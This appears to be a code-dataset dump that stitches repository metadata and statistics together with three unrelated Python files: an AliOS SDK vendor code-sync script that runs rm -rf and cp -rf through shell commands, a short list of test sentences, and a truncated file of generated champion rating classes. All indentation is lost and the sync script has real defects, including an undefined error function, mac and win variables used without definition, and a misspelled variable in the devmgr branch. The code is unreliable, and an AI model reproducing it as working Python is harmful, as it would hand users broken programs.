| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 10
|
fe2bae18860703f53e7c8e01af913a623b940ac1
| 29,617
|
py
|
Python
|
tools/codesync/vendorslib.py
|
ghsecuritylab/Alios_SDK
|
edd416e7d2961db42c2100ac2d6237ee527d1aee
|
[
"Apache-2.0"
] | 2
|
2021-05-28T08:25:33.000Z
|
2021-11-17T02:58:50.000Z
|
tools/codesync/vendorslib.py
|
ghsecuritylab/Alios_SDK
|
edd416e7d2961db42c2100ac2d6237ee527d1aee
|
[
"Apache-2.0"
] | null | null | null |
tools/codesync/vendorslib.py
|
ghsecuritylab/Alios_SDK
|
edd416e7d2961db42c2100ac2d6237ee527d1aee
|
[
"Apache-2.0"
] | 5
|
2018-05-23T02:56:10.000Z
|
2021-01-02T16:44:09.000Z
|
import sys
import traceback
import errno
import os
import modules
#########################################
# add supported chip vendors branch here
#########################################
class vendorslib:
def __init__(self, configs):
self.srcbase = configs.srcbase
self.base = configs.dstbase
self.srcdir = "./aos"
self.configs = configs
def get_vendor_repo(self):
self.git_cmd = "git clone " + self.configs.dstlink + " aos_vendor_base"
self.dstdir = "./aos_vendor_base"
return 0
def cleanup_code(self):
win = ""
mac = ""
if self.configs.synctype == "nano":
src = self.srcdir + "/alinkconfig.db"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/bootloader"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/device"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/example/nano"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/example/*"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.srcdir + "/example"
linux = "cp -rf " + "./nano " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/script"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/tags"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/doc"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/framework"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/security"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/test"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
# kernel folder
src = self.srcdir + "/kernel/rhino"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel/vcall"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel/vfs"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel/yloop"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel/*"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel"
linux = "cp -rf ./rhino " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel"
linux = "cp -rf ./vcall " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel"
linux = "cp -rf ./vfs " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel"
linux = "cp -rf ./yloop " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/board/linuxhost"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/board/*"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/board"
if os.path.exists("./linuxhost"):
linux = "cp -rf ./linuxhost " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu/linux"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu/include"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu/*"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu"
if os.path.exists("./linux"):
linux = "cp -rf ./linux " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu/"
if os.path.exists("./include"):
linux = "cp -rf ./include " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/build"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/build"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir
if os.path.exists("./build"):
linux = "cp -rf ./build " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/*"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir
src = self.srcdir + "/*"
linux = "cp -rf " + src + " " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
elif self.base == "mxchip" or self.base == "github" or self.base == "esp":
dst = self.dstdir + "/*"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/.gitignore"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/.vscode"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/*"
dst = self.dstdir
linux = "cp -rf " + src + " " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
else:
##############################################################
# keep platform and board folder the same as different targets
##############################################################
src = self.dstdir + "/platform"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/linux " + "./platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/beken " + "./platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.dstdir + "/board"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.dstdir + "/example"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/*"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/.gitignore"
if os.path.exists(dst):
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/*"
dst = self.dstdir
linux = "cp -rf " + src + " " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/platform"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/board"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/example"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
if os.path.exists("./platform"):
linux = "cp -rf " + "./platform "+ self.dstdir
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + "./platform/mcu/linux " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + "./platform/mcu/beken " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
else:
linux = "mkdir " + self.dstdir + "/platform"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/arch " + self.dstdir + "/platform/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "mkdir " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/linux " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/beken " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/include " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
if os.path.exists("./board"):
linux = "cp -rf " + "./board "+ self.dstdir
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/board/linuxhost "+ self.dstdir + "/board/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/board/mk3060 "+ self.dstdir + "/board/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
else:
linux = "mkdir " + self.dstdir + "/board"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/board/linuxhost "+ self.dstdir + "/board/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/board/mk3060 "+ self.dstdir + "/board/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
if os.path.exists("./example"):
linux = "cp -rf " + "./example "+ self.dstdir
else:
linux = "cp -rf " + self.srcdir + "/example "+ self.dstdir
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
def make_folder(self, module):
dst = ""
# default build mk3060
if module == "mesh":
if self.base == "esp":
dst = self.dstdir + "/kernel/protocols/mesh/lib/esp32"
else:
dst = self.dstdir + "/kernel/protocols/mesh/lib/mk3060"
elif module == "ywss":
if self.base == "esp":
dst = self.dstdir + "/framework/ywss/lib/esp32"
else:
dst = self.dstdir + "/framework/ywss/lib/mk3060"
elif module == "rhino":
dst = self.dstdir + "/kernel/rhino/lib/mk3060"
elif module == "wsf":
dst = self.dstdir + "/framework/connectivity/wsf/lib/mk3060"
elif module == "msdp":
if self.srcbase == "1.0.1":
base_dstdir = self.dstdir + "/framework/protocol/alink/msdp/"
else:
base_dstdir = self.dstdir + "/framework/gateway/msdp/"
dst = base_dstdir + "lib/mk3060"
elif module == "devmgr":
if self.srcbase == "1.0.1":
base_dstdir = self.dstdir + "/framework/protocol/alink/devmgr/"
else:
base_srcdir = self.dstdir + "/framework/gateway/devmgr/"
dst = base_dstdir + "lib/mk3060"
elif module == "gateway":
dst = self.dstdir + "/framework/gateway/lib/mk3060"
else:
return 0
linux = "mkdir " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
return 1
modules.popen(cmd, shell=True, cwd=os.getcwd())
# add corresponding platform's folder here
return 0
def make_lib(self, module):
linux = ""
mac = ""
win = ""
if module == "mesh":
linux = "aos makelib -r ARM968E-S kernel/protocols/mesh"
elif module == "ywss":
linux = "aos makelib -r ARM968E-S framework/ywss"
elif module == "rhino":
linux = "aos makelib -r ARM968E-S kernel/rhino"
elif module == "wsf":
linux = "aos makelib -r ARM968E-S framework/connectivity/wsf"
elif module == "msdp":
linux = "aos makelib -r ARM968E-S framework/gateway/msdp"
elif module == "devmgr":
linux = "aos makelib -r ARM968E-S framework/gateway/devmgr"
elif module == "gateway":
linux = "aos makelib -r ARM968E-S framework/gateway"
else:
return 0
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
return 1
modules.popen(cmd, shell=True, cwd=os.getcwd())
return 0
def copy_lib(self, module):
linux = ""
mac = ""
win = ""
if module == "mesh":
src = self.srcdir + "/mesh.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/kernel/protocols/mesh/lib/mk3060/libmesh.a"
elif module == "ywss":
src = self.srcdir + "/ywss.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/ywss/lib/mk3060/libywss.a"
elif module == "rhino":
src = self.srcdir + "/rhino.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/kernel/rhino/lib/mk3060/librhino.a"
elif module == "wsf":
src = self.srcdir + "/wsf.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/connectivity/wsf/lib/mk3060/libwsf.a"
elif module == "msdp":
src = self.srcdir + "/msdp.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/gateway/msdp/lib/mk3060/libmsdp.a"
elif module == "devmgr":
src = self.srcdir + "/devmgr.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/gateway/devmgr/lib/mk3060/libdevmgr.a"
elif module == "gateway":
src = self.srcdir + "/gateway.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/gateway/lib/mk3060/libgateway.a"
else:
return 0
linux = "cp -f " + src + " " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
return 1
modules.popen(cmd, shell=True, cwd=os.getcwd())
return 0
| 50.714041
| 142
| 0.512949
| 3,493
| 29,617
| 4.343258
| 0.038935
| 0.067234
| 0.174807
| 0.049305
| 0.895656
| 0.886494
| 0.883528
| 0.856766
| 0.84009
| 0.835344
| 0
| 0.018587
| 0.342405
| 29,617
| 583
| 143
| 50.801029
| 0.760372
| 0.005909
| 0
| 0.766537
| 0
| 0
| 0.172055
| 0.034486
| 0.015564
| 0
| 0
| 0
| 0
| 1
| 0.011673
| false
| 0
| 0.009728
| 0
| 0.042802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe5f74d6228b5e0b2289985660b2bac191cb765a
| 286
|
py
|
Python
|
tests/factory/raw_sentences_samples.py
|
easydatapy/easytxt
|
9c2a424d3e39c50722c5b543b96c1450181f94e4
|
[
"BSD-3-Clause"
] | 4
|
2020-08-25T17:39:04.000Z
|
2020-08-31T20:14:37.000Z
|
tests/factory/raw_sentences_samples.py
|
sitegroove/easytxt
|
9c2a424d3e39c50722c5b543b96c1450181f94e4
|
[
"BSD-3-Clause"
] | null | null | null |
tests/factory/raw_sentences_samples.py
|
sitegroove/easytxt
|
9c2a424d3e39c50722c5b543b96c1450181f94e4
|
[
"BSD-3-Clause"
] | null | null | null |
english = [
(
"Mr. John and Ms. Sarah are here. Say hello!!!",
["Mr. John and Ms. Sarah are here.", "Say hello!!!"],
),
("* camera * notebook * photo", ["camera", "notebook", "photo"]),
("- camera - notebook - photo", ["camera", "notebook", "photo"]),
]
| 31.777778
| 69
| 0.506993
| 31
| 286
| 4.677419
| 0.419355
| 0.386207
| 0.524138
| 0.517241
| 0.951724
| 0.951724
| 0.951724
| 0.951724
| 0.951724
| 0
| 0
| 0
| 0.258741
| 286
| 8
| 70
| 35.75
| 0.683962
| 0
| 0
| 0
| 0
| 0
| 0.632867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fe61a5494613c26facd55a457dc788a26a56d82b
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_akali/na_akali_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_akali/na_akali_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_akali/na_akali_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Akali_Top_Aatrox(Ratings):
pass
class NA_Akali_Top_Ahri(Ratings):
pass
class NA_Akali_Top_Akali(Ratings):
pass
class NA_Akali_Top_Alistar(Ratings):
pass
class NA_Akali_Top_Amumu(Ratings):
pass
class NA_Akali_Top_Anivia(Ratings):
pass
class NA_Akali_Top_Annie(Ratings):
pass
class NA_Akali_Top_Ashe(Ratings):
pass
class NA_Akali_Top_AurelionSol(Ratings):
pass
class NA_Akali_Top_Azir(Ratings):
pass
class NA_Akali_Top_Bard(Ratings):
pass
class NA_Akali_Top_Blitzcrank(Ratings):
pass
class NA_Akali_Top_Brand(Ratings):
pass
class NA_Akali_Top_Braum(Ratings):
pass
class NA_Akali_Top_Caitlyn(Ratings):
pass
class NA_Akali_Top_Camille(Ratings):
pass
class NA_Akali_Top_Cassiopeia(Ratings):
pass
class NA_Akali_Top_Chogath(Ratings):
pass
class NA_Akali_Top_Corki(Ratings):
pass
class NA_Akali_Top_Darius(Ratings):
pass
class NA_Akali_Top_Diana(Ratings):
pass
class NA_Akali_Top_Draven(Ratings):
pass
class NA_Akali_Top_DrMundo(Ratings):
pass
class NA_Akali_Top_Ekko(Ratings):
pass
class NA_Akali_Top_Elise(Ratings):
pass
class NA_Akali_Top_Evelynn(Ratings):
pass
class NA_Akali_Top_Ezreal(Ratings):
pass
class NA_Akali_Top_Fiddlesticks(Ratings):
pass
class NA_Akali_Top_Fiora(Ratings):
pass
class NA_Akali_Top_Fizz(Ratings):
pass
class NA_Akali_Top_Galio(Ratings):
pass
class NA_Akali_Top_Gangplank(Ratings):
pass
class NA_Akali_Top_Garen(Ratings):
pass
class NA_Akali_Top_Gnar(Ratings):
pass
class NA_Akali_Top_Gragas(Ratings):
pass
class NA_Akali_Top_Graves(Ratings):
pass
class NA_Akali_Top_Hecarim(Ratings):
pass
class NA_Akali_Top_Heimerdinger(Ratings):
pass
class NA_Akali_Top_Illaoi(Ratings):
pass
class NA_Akali_Top_Irelia(Ratings):
pass
class NA_Akali_Top_Ivern(Ratings):
pass
class NA_Akali_Top_Janna(Ratings):
pass
class NA_Akali_Top_JarvanIV(Ratings):
pass
class NA_Akali_Top_Jax(Ratings):
pass
class NA_Akali_Top_Jayce(Ratings):
pass
class NA_Akali_Top_Jhin(Ratings):
pass
class NA_Akali_Top_Jinx(Ratings):
pass
class NA_Akali_Top_Kalista(Ratings):
pass
class NA_Akali_Top_Karma(Ratings):
pass
class NA_Akali_Top_Karthus(Ratings):
pass
class NA_Akali_Top_Kassadin(Ratings):
pass
class NA_Akali_Top_Katarina(Ratings):
pass
class NA_Akali_Top_Kayle(Ratings):
pass
class NA_Akali_Top_Kayn(Ratings):
pass
class NA_Akali_Top_Kennen(Ratings):
pass
class NA_Akali_Top_Khazix(Ratings):
pass
class NA_Akali_Top_Kindred(Ratings):
pass
class NA_Akali_Top_Kled(Ratings):
pass
class NA_Akali_Top_KogMaw(Ratings):
pass
class NA_Akali_Top_Leblanc(Ratings):
pass
class NA_Akali_Top_LeeSin(Ratings):
pass
class NA_Akali_Top_Leona(Ratings):
pass
class NA_Akali_Top_Lissandra(Ratings):
pass
class NA_Akali_Top_Lucian(Ratings):
pass
class NA_Akali_Top_Lulu(Ratings):
pass
class NA_Akali_Top_Lux(Ratings):
pass
class NA_Akali_Top_Malphite(Ratings):
pass
class NA_Akali_Top_Malzahar(Ratings):
pass
class NA_Akali_Top_Maokai(Ratings):
pass
class NA_Akali_Top_MasterYi(Ratings):
pass
class NA_Akali_Top_MissFortune(Ratings):
pass
class NA_Akali_Top_MonkeyKing(Ratings):
pass
class NA_Akali_Top_Mordekaiser(Ratings):
pass
